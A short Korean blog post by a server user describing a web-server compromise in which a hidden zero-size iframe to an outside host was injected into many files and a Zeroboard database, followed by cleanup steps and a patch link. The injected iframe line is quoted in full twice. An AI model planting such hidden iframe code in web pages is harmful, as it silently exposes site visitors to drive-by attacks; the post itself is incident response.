지역 단체들이 이용하는 서버가 있는데 몇몇 계정에

 

<?ob_start();?><iframe src="http://www.ro521.com/test.htm" width=0 height=0></iframe><?ob_start();?><iframe src="http://www.ro521.com/test.htm" width=0 height=0></iframe>

 

이런 스크립트가 몽땅 들어와있다.

지난 크리스마스에. 크리스마스에. 크리스마스에. 크리스마스에.

.... 난 아무것도 모른 채 그냥 놀고 있었으니 별로 할 말은 없지만

똥줄 태운 서버관리자들 많았을거라 생각해보면, 고것 참...;

 

난 어디에 취약점이 있어서 저런 일이 가능했는지도 모르겠고,

이 서버는 웹접속기록에 ip를 아예 남기지 않도록 해놨기 때문에 어느곳에서 들어왔는지도 파악할 수 없다.

-_-;;; 이런 일 겪고 나니까 ip를 남겨놓도록 해야하나 싶기도 한데....

 

아무튼 너무 많은 파일들에 스크립트가 삽입돼서 어떻게 손을 못쓰고 있었다.

(vi로 할줄 아는 것이라곤 쓰고 저장하고 닫는 게 전부....)

퍼미션을 잘못 관리해 자료실에 올려둔 모든 파일에 스크립트가 삽입된 계정도 있다.

 

지금 해본 건 서버의 파일을 몽땅 다운 받은 다음에 ultraedit로 파일 찾아 바꾸기를 하는 것.

결과는 썩 괜찮은 듯??

 

 

 

조처 사항.

 

제로보드의 경우

- data/icon 폴더에서 group_qazwsxedc.jpg, visitLog.php  삭제.

- db에서 <?ob_start();?><iframe src="http://www.ro521.com/test.htm" width=0 height=0></iframe><?ob_start();?><iframe src="http://www.ro521.com/test.htm" width=0 height=0></iframe> 다 삭제.(제로보드는 그룹설정에 코드가 삽입되어 있다.)

- 서버에 있는 파일들 모두 다운 받은 뒤 ultraedit로 위 스크립트 찾아 바꾼 뒤 다시 업로드 한다.(울트라에디트에는 폴더 안에 있는 파일을 한꺼번에 찾아바꾸는 기능이 있다.)

- http://www.xpressengine.com/zb4_security/ 이곳에서 보안관련 패치를 받아 업데이트 한다.